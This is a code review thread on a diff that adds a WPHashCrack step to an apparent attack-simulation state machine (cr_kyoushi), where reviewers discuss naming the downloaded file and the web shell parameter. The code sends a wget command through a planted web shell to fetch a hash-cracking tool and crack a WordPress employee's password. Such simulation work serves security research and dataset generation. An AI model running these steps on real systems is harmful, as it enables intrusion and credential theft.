src/cr_kyoushi/statemachines/aecid_attacker/actions.py

```diff
@@ -510,6 +510,83 @@ def __call__(
             log.error("No post to upload shell to")
 
 
+class WPHashCrack:
+    """Transition function uses WP hash cracker to find employee password."""
+
+    def __init__(self, wl_host, attacked_user):
+        """
+        Args:
+            wl_host: address of the host where wordlist is available.
+            attacked_user: the name of the WP user to crack the password.
+        """
+        self.url = (
+            "https://github.com/ait-aecid/wphashcrack/archive/refs/tags/v0.1.tar.gz"
+        )
+        self.wl_host = wl_host
+        self.attacked_user = attacked_user
+
+    def __call__(
+        self,
+        log: BoundLogger,
+        current_state: str,
+        context: Context,
+        target: Optional[str],
+    ):
+        web_shell = context.web_shell
+        log = log.bind(
+            url=self.url,
+            wl_host=self.wl_host,
+            attacked_user=self.attacked_user,
+            web_shell=web_shell,
+        )
+        if web_shell is not None:
+            log.info("Download WPHashCrack")
+            output = send_request(
+                log, web_shell, ["wget", self.url], "wp_meta", False, None
```

Comment:
You might want to also consider using `-O` so you save the downloaded file using a different name.
This can even be an optional feature.

Reply:
Also you cannot assume that the web_shell param name is `wp_meta` this would just be the default name.
The same holds for all other web_shell requests

Reply:
Done